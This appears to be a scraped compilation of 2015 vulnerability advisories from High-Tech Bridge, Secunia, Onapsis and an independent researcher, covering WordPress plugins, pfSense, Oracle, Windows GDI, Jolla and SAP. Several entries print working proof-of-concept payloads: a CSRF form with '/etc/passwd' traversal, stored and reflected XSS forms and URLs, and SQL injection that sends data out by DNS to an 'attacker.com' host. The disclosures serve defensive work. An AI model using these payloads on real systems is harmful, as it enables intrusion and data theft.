Requested via contact form and emails, no reply. 2015-05-06 Public disclosure. Currently we are not aware of any official solution for this vulnerability. --- References: [1] High-Tech Bridge Advisory HTB23255 - https://www.htbridge.com/advisory/HTB23255 - Arbitrary Variable Overwrite in eShop WordPress Plugin. [2] eShop WordPress Plugin - http://quirm.net/ - eShop is an accessible shopping cart plugin for WordPress, packed with various features. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Multiple Vulnerabilities in TheCartPress WordPress plugin
Advisory ID: HTB23254 Product: TheCartPress WordPress plugin Vendor: TheCartPress team Vulnerable Version(s): 1.3.9 and probably prior Tested Version: 1.3.9 Advisory Publication: April 8, 2015 [without technical details] Vendor Notification: April 8, 2015 Public Disclosure: April 29, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284] CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302 Risk Level: High CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin. 1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301 Input passed via the tcp_box_path HTTP POST parameter passed to /wp-admin/admin.php?page=checkout_editor_settings URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences. In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well. Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it: form action=http://wordpress/wp-admin/admin.php?page=checkout_editor_settings; method=post name=main input type=hidden name=tcp_save_fields value='1' input type=hidden name=tcp_box_path value='../../../../../etc/passwd' input type=submit id=btn /form script document.main.submit(); /script 2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300 During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in Shipping address and Billing address sections are not being sanitized before being stored in the local database. Simple mass-XSS PoC against Billing address section (PoC against Shipping address scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database: form action=http://wordpress/shopping-cart/checkout/; method=post name=main input type=hidden name=selected_billing_id value='1' input type=hidden name=selected_billing_address value='new' input type=hidden name=billing_firstname value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_lastname value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_company value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_tax_id_number value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_country_id value='AF' input type=hidden name=billing_region_id value='' input type=hidden name=billing_region value='' input type=hidden name=billing_city value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_street value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_street_2 value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_postcode value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_telephone_1 value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_telephone_2 value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_fax value='scriptalert(/immuniweb/);/script' input type=hidden name=billing_email value='m...@mail.com' input type=hidden name=tcp_continue value='' input type=hidden name=tcp_step value='1' input type=submit id=btn /form A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL: http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]action=tcp_print_order As well as on the following URL accessible to WordPress administrator only: http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php 3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302 Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL: http://wordpress/shopping-cart/checkout/?tcp_checkout=okorder_id=[order_id] And just after open the following URL to see full order details: http://wordpress/wp
Secunia Research: Oracle Outside In ibpsd2.dll PSD File Processing Buffer Overflow Vulnerability
== Secunia Research 16/04/2015 Oracle Outside In ibpsd2.dll PSD File Processing Buffer Overflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Oracle Outside In versions 8.4.1, 8.5.0, and 8.5.1 == 2) Severity Rating: Moderately critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Oracle Outside In, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a sign extension error in ibpsd2.dll when processing PSD files, which can be exploited to cause a heap-based buffer overflow. Successful exploitation of the vulnerability may allow execution of arbitrary code. == 4) Solution Apply update. Please see the Oracle Critical Patch Update Advisory for April 2015 for details. == 5) Time Table 11/02/2015 - Vendor notified. 11/02/2015 - Vendor response. 12/02/2015 - Vendor supplied bug ticket ID. 24/02/2015 - Vendor supplied information of fix in main codeline. 13/03/2015 - Vendor requested delay of disclosure. 16/03/2015 - Replied to vendor and requested a new estimated date. 16/03/2015 - Vendor replied that estimated date will be investigated. 19/03/2015 - Vendor supplied 14/07/2015 as estimated fix date. 24/03/2015 - Vendor supplied status report. 10/04/2015 - Vendor supplied 14/04/2015 as estimated fix date. 14/04/2015 - Release of vendor patch. 15/04/2015 - Public disclosure. == 6) Credits Discovered by Dmitry Janushkevich, Secunia Research. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2015-0493 identifier for the vulnerability. == 8) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/company/jobs/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2015-2/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: Microsoft Windows GDI MRSETDIBITSTODEVICE ::bPlay() EMF Parsing Memory Corruption Vulnerability
== Secunia Research 15/04/2015 Microsoft Windows GDI MRSETDIBITSTODEVICE ::bPlay() EMF Parsing Memory Corruption Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Microsoft Windows 7 * Microsoft Windows Server 2003 Datacenter Edition * Microsoft Windows Server 2003 Enterprise Edition * Microsoft Windows Server 2003 Standard Edition * Microsoft Windows Server 2003 Web Edition * Microsoft Windows Storage Server 2003 * Microsoft Windows Server 2008 * Microsoft Windows Vista == 2) Severity Rating: Highly critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an error within the MRSETDIBITSTODEVICE::bPlay() function (GDI32.dll) and can be exploited to cause a memory corruption via an EMF file with a specially crafted EMR_SETDIBITSTODEVICE record. Successful exploitation allows execution of arbitrary code. == 4) Solution Apply update provided by MS15-035. == 5) Time Table 14/01/2015 - Vendor notified. 15/01/2015 - Vendor response. 15/01/2015 - Vendor requests delay of disclosure. 15/01/2015 - Replied to vendor requesting planned date of update. 16/02/2015 Requested status update. 20/02/2015 - Vendor response with no timeline. 23/02/2015 - Replied to vendor requesting future status updates. 26/03/2015 - Requested status update and planned date of update. 08/04/2015 - Vendor response with expected release on 14/04/2015. 11/04/2015 - Replied to vendor. 14/04/2015 - Release of vendor patch and public disclosure. == 6) Credits Discovered by Hossein Lotfi, Secunia Research. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2015-1645 identifier for the vulnerabilities. == 8) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/company/jobs/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2015-1/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Arbitrary file deletion and multiple XSS vulnerabilities in pfSense
Advisory ID: HTB23251 Product: pfSense Vendor: Electric Sheep Fencing LLC Vulnerable Version(s): 2.2 and probably prior Tested Version: 2.2 Advisory Publication: March 4, 2015 [without technical details] Vendor Notification: March 4, 2015 Vendor Patch: March 5, 2015 Public Disclosure: March 25, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352] CVE References: CVE-2015-2294, CVE-2015-2295 Risk Level: Medium CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via CSRF (Cross-Site Request Forgery) attacks. Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root privileges, steal administrator’s cookies and gain complete control over the web application and even the entire system, as pfSense is running with root privileges and allows OS command execution via its web interface. 1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294 1.1 Input passed via the zone HTTP GET parameter to /status_captiveportal.php script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. PoC code below uses JS alert() function to display ImmuniWeb popup: https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.2 Input passed via the if and dragtable HTTP GET parameters to /firewall_rules.php script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. Below are two PoC codes for each vulnerable parameter that use JS alert() function to display ImmuniWeb popup: https://[host]/firewall_rules.php?undodrag=1dragtable=if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/firewall_rules.php?if=wanundodrag=1dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.3 Input passed via the queue HTTP GET parameter to /firewall_shaper.php script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. PoC code below uses JS alert() function to display ImmuniWeb popup: https://[host]/firewall_shaper.php?interface=wanaction=addqueue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.4 Input passed via the id HTTP GET parameter to /services_unbound_acls.php script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. PoC code below uses JS alert() function to display ImmuniWeb popup: https://[host]/services_unbound_acls.php?act=editid=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.5 Input passed via the filterlogentries_time, filterlogentries_sourceipaddress, filterlogentries_sourceport, filterlogentries_destinationipaddress, filterlogentries_interfaces, filterlogentries_destinationport, filterlogentries_protocolflags and filterlogentries_qty HTTP GET parameters to /diag_logs_filter.php script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. Below are eight PoC codes for each vulnerable parameter that use JS alert() function to display ImmuniWeb popup: https://[host]/diag_logs_filter.php?filterlogentries_submit=1filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert
Jolla Phone tel URI Spoofing
__ -- NSOADV-2015-001 --- Jolla Phone tel URI Spoofing __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: Jolla Phone tel URI Spoofing Severity: Low Advisory ID:NSOADV-2015-001 Date Reported: 2015-01-29 Release Date: 2015-03-13 Author: Nikolas Sotiriu Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2015-001.txt Vendor: Jolla (https://www.jolla.com/) Affected Products: Jolla Phone Affected Versions: = Sailfish OS 1.1.1.27 (Vaarainjärvi) Remote Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Description: The Sailfish OS of the Jolla Phone contains a vulnerability that allows to spoof the phone number, passed by a tel URI through an A HREF of a website with some spaces (HTML #32;). This could be used to trick a victim to dial a premium-rate telephone number, for example. Proof of Concept: = a href=tel:00[25xSpaces]Spoofed Text[38Spaces]aCall/a Test Site http://sotiriu.de/demos/callspoof.html Solution: = Install Version 1.1.2.16 (Yliaavanlampi) https://together.jolla.com/question/82037/release-notes-upgrade-112- yliaavanlampi-early-access/ Disclosure Timeline: 2015-01-28: Asked for a PGP Key (secur...@jolla.com) 2015-01-29: Got the PGP Key 2015-01-29: Sent vulnerability information to vendor 2015-01-29: Feedback that the vendor is looking into the problem 2015-01-30: Got detailed information about the patch process and timeline 2015-02-19: Got an E-Mail that the patched version is released 2015-03-13: Release of this advisory
SQL Injection in Huge IT Slider WordPress Plugin
Advisory ID: HTB23250 Product: Huge IT Slider WordPress Plugin Vendor: Huge-IT Vulnerable Version(s): 2.6.8 and probably prior Tested Version: 2.6.8 Advisory Publication: February 19, 2015 [without technical details] Vendor Notification: February 19, 2015 Vendor Patch: March 11, 2015 Public Disclosure: March 12, 2015 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2015-2062 Risk Level: Medium CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in Huge IT Slider WordPress Plugin. This vulnerability can be exploited by website administrators as well as anonymous attackers to inject and execute arbitrary SQL queries within the application’s database. 1) SQL injection in Huge IT Slider WordPress plugin: CVE-2015-2062 The vulnerability exists due to insufficient filtration of input data passed via the removeslide HTTP GET parameter to /wp-admin/admin.php script when task parameter is set to popup_posts or edit_cat. A remote authenticated attacker with administrative privileges can execute arbitrary SQL queries within the application’s database. Below are two simple exploit codes that are based on DNS Exfiltration technique. They can be used if the database of the vulnerable application is hosted on a Windows system. The codes will send a DNS request requesting IP address for `version()` (or any other sensitive output from the database) subdomain of .attacker.com (a domain name, DNS server of which is controlled by the attacker). 1. Exploit example for task=popup_posts: http://[host]/wp-admin/admin.php?page=sliders_huge_it_slidertask=popup_postsid=1removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 -- 2. Exploit example for task=edit_cat: http://[host]/wp-admin/admin.php?page=sliders_huge_it_slidertask=edit_catid=1removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 -- This vulnerability can be also exploited remotely by non-authenticated attackers using CSRF vector, since the web application is also prone to Cross-Site Request Forgery attacks. The attacker could use the following exploit code against authenticated website administrator to determine version of installed MySQL server: img src=http://[host]/wp-admin/admin.php?page=sliders_huge_it_slidertask=popup_postsid=1removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 -- --- Solution: Update to Huge IT Slider 2.7.0 More Information: https://wordpress.org/support/topic/huge-it-slider-security-vulnerability-notification-sql-injection --- References: [1] High-Tech Bridge Advisory HTB23250 - https://www.htbridge.com/advisory/HTB23250 - SQL Injection in Huge IT Slider WordPress Plugin. [2] Huge IT Slider WordPress Plugin - http://huge-it.com/ - Huge IT slider is a convenient tool for organizing the images represented on your website into sliders. Each product on the slider is assigned with a relevant slider, which makes it easier for the customers to search and identify the needed images within the slider. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide
[Onapsis Security Advisory 2015-001] Multiple Reflected Cross Site Scripting Vulnerabilities in SAP HANA Web-based Development Workbench
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security AdvisoryONAPSIS-2015-001: Multiple Reflected Cross Site Scripting Vulnerabilities in SAP HANA Web-based Development Workbench 1. Impact on Business = By exploiting this vulnerability a remote unauthenticated attacker would be able to attack other users of the system. Risk Level: Medium 2. Advisory Information = - - Public Release Date: 2015-02-25 - - Subscriber Notification Date: 2015-02-25 - - Last Revised: 2015-02-25 - - Security Advisory ID: ONAPSIS-2015-001 - - Onapsis SVS ID: ONAPSIS-00137 and ONAPSIS-00138 - - CVE: CVE-2015-2072 - - Researcher: Will Vandevanter - - Initial Base CVSS v2: 4.3 (AV:N/AC:M/AU:N/C:N/I:P/A:N) 3. Vulnerability Information - - Vendor: SAP - - Affected Components: -HANA - Release 73 (1.00.73.00.389160) - HANA Developer Edition - Release 80 (1.00.80.00.391861) (Check SAP Note 2069676 for detailed information on affected releases) - - Vulnerability Class: CWE-79: Improper Neutralization of Input During Web Page Generation (Reflected Cross-Site Scripting) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: No - - Original Advisory: http://www.onapsis.com/research/security-advisories/multiple-reflected-cross-site-scripting-vulnerabilities-in-sap-hana-webbased-development-workbench 4. Affected Components Description == SAP HANA is a platform for real-time business. It combines database, data processing, and application platform capabilities in-memory. The platform provides libraries for predictive, planning, text processing, spatial, and business analytics. 5. Vulnerability Details The SAP HANA contains a reflected Cross Site Scripting Vulnerability (XSS) on the page /sap/hana/ide/core/plugins/editor/templates/trace/hanaTraceDetailService.xsjs and /sap/hana/xs/ide/editor/templates/trace/hanaTraceDetailService.xsjs. A reflected cross-site scripting attack can be used to non-permanently deface or modify displayed content from a Web site. Reflected cross-site scripting can be used to steal another user's authentication information, such as data relating to their current session. An attacker who gains access to this data may use it to impersonate the user and access all information with the same rights as the target user. If an administrator is impersonated, the security of he application may be fully compromised. 6. Solution === SAP has released SAP Note 2069676 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/2069676 Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2014-02-25: Onapsis provides vulnerability information to SAP AG. 2014-02-26: SAP confirms having the information of vulnerability. 2014-10-14: SAP releases security patches. 2015-02-25: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis gives organizations the adaptive advantage to succeed in securing business-critical applications by combining technology, research and analytics. Onapsis enables every security and compliance team an adaptive approach to focus on the factors that matter most to their business-critical applications that house vital data and run business processes including SAP Business Suite, SAP HANA and SAP Mobile deployments. Onapsis provides technology solutions including Onapsis X1, the de-facto SAP security auditing tool, and Onapsis Security Platform which delivers enterprise vulnerability, compliance, detection and response capabilities with analytics. The Onapsis Research Labs provide subject matter expertise that combines in-depth knowledge and experience to deliver technical and business-context with sound security judgment. This enables organizations to efficiently uncover security and compliance gaps and prioritize the resolution within applications running on SAP platforms. Onapsis delivers tangible business results including decreased business risk, highlighted compliance gaps, lower operational security costs and demonstrable value on investment. -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: Onapsis Research Team iEYEARECAAYFAlTt3s8ACgkQz3i6WNVBcDXcCACcDjpFk1cO1kqYD1v6LK4vNZYZ
[Onapsis Security Advisory 2015-004] SAP Business Objects Unauthorized Audit Information Delete via CORBA
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory ONAPSIS-2015-004: SAP Business Objects Unauthorized Audit Information Delete via CORBA 1. Impact on Business = By exploiting this vulnerability a remote unauthenticated attacker would be able to delete auditing information of the remote system. This way, the attacker could perform malicious activities without being detected. Risk Level: High 2. Advisory Information === - - Public Release Date: 2015-02-25 - - Subscriber Notification Date: 2015-02-25 - - Last Revised: 2015-02-25 - - Security Advisory ID: ONAPSIS-2015-004 - - Onapsis SVS ID: ONAPSIS-00112 - - CVE: CVE-2015-2075 - - Researcher: Will Vandevanter - - Initial Base CVSS v2: 6.4 (AV:N/AC:L/AU:N/C:N/I:P/A:P) 3. Vulnerability Information - - Vendor: SAP - - Affected Components: - BussinessObjects Edge 4.0 (Check SAP Note 2011396 for detailed information on affected releases) - - Vulnerability Class: Improper Authorization (CWE-285) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: No - - Original Advisory: http://www.onapsis.com/esearch/security-advisories/sap-business-objects-unauthorized-audit-information-delete-via-corba 4. Affected Components Description == Business Objects is part of the Business Intelligence platform from SAP. It has components that provide performance management, planning, reporting, query and analysis and enterprise information management. Every Business Objects installation provides a web service to interact with different platform services. 5. Vulnerability Details It is possible for an unauthenticated user to remove audit events from a remote BusinessObjects service using CORBA. Specifically, the attacker can tell the remote service (i.e. the auditee) to clear an event from it's queue. After the event is removed from the auditee queue, the auditor will never have knowledge of the event and, hence, it will not be written to the Audit database. An attacker can use this to hide their actions. By default, the auditor polls all auditees every 5 minutes to ask for events in their queue. Note, this vulnerability does not allow an attacker to remove events already written to the database. It only allows events waiting in the auditee queue to be removed. The clearData CORBA operation is used to remove the event; authentication is not required. 6. Solution === SAP has released SAP Note 2011396 which provides patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/2011396 Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2014-01-16: Onapsis provides vulnerability information to SAP AG. 2014-02-17: SAP confirms having the information of vulnerability. 2014-10-14: SAP releases security patches. 2015-02-25: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis gives organizations the adaptive advantage to succeed in securing business-critical applications by combining technology, research and analytics. Onapsis enables every security and compliance team an adaptive approach to focus on the factors that matter most to their business-critical applications that house vital data and run business processes including SAP Business Suite, SAP HANA and SAP Mobile deployments. Onapsis provides technology solutions including Onapsis X1, the de-facto SAP security auditing tool, and Onapsis Security Platform which delivers enterprise vulnerability, compliance, detection and response capabilities with analytics. The Onapsis Research Labs provide subject matter expertise that combines in-depth knowledge and experience to deliver technical and business-context with sound security judgment. This enables organizations to efficiently uncover security and compliance gaps and prioritize the resolution within applications running on SAP platforms. Onapsis delivers tangible business results including decreased business risk, highlighted compliance gaps, lower operational security costs and demonstrable value on investment. -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: Onapsis Research Team iEYEARECAAYFAlTt3yEACgkQz3i6WNVBcDVbuACfXRTcTc+4MiUKl60VHRJaN1UR
[Onapsis Security Advisory 2015-005] SAP Business Objects Unauthorized Audit Information Access via CORBA
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security AdvisoryONAPSIS-2015-005: SAP Business Objects Unauthorized Audit Information Access via CORBA 1. Impact on Business = By exploiting this vulnerability a remote unauthenticated attacker would be able to read auditing information thus accessing sensitive business data. Access to this functionality should be restricted. Risk Level: Medium 2. Advisory Information === - - Public Release Date: 2015-02-25 - - Subscriber Notification Date: 2015-02-25 - - Last Revised: 2015-02-25 - - Security Advisory ID: ONAPSIS-2015-005 - - Onapsis SVS ID: ONAPSIS-00110 - - CVE: CVE-2015-2076 - - Researcher: Will Vandevanter - - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N) 3. Vulnerability Information - - Vendor: SAP - - Affected Components: - BussinessObjects Edge 4.0 (Check SAP Note 2011395 for detailed information on affected releases) - - Vulnerability Class: Improper Authorization (CWE-285) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: No - - Original Advisory: http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-audit-information-access-via-corba 4. Affected Components Description == Business Objects is part of the Business Intelligence platform from SAP. It has components that provide performance management, planning, reporting, query and analysis and enterprise information management. Every Business Objects installation provides a web service to interact with different platform services. 5. Vulnerability Details It is possible for an unauthenticated user to retrieve any audit events from a remote BusinessObjects service. This can disclose sensitive information including report names, universe queries, logins, etc. Auditing details are listed in the Auditing tab of the CMS. All services which expose a Auditing service are vulnerable. In the default setting this includes all BusinessObjects services except the CMS. 6. Solution === SAP has released SAP Note 2011395 which provides patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/2011395 Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2014-02-16: Onapsis provides vulnerability information to SAP AG. 2014-02-17: SAP confirms having the information of vulnerability. 2014-10-14: SAP releases security patches. 2015-02-25: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis gives organizations the adaptive advantage to succeed in securing business-critical applications by combining technology, research and analytics. Onapsis enables every security and compliance team an adaptive approach to focus on the factors that matter most to their business-critical applications that house vital data and run business processes including SAP Business Suite, SAP HANA and SAP Mobile deployments. Onapsis provides technology solutions including Onapsis X1, the de-facto SAP security auditing tool, and Onapsis Security Platform which delivers enterprise vulnerability, compliance, detection and response capabilities with analytics. The Onapsis Research Labs provide subject matter expertise that combines in-depth knowledge and experience to deliver technical and business-context with sound security judgment. This enables organizations to efficiently uncover security and compliance gaps and prioritize the resolution within applications running on SAP platforms. Onapsis delivers tangible business results including decreased business risk, highlighted compliance gaps, lower operational security costs and demonstrable value on investment. -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: Onapsis Research Team 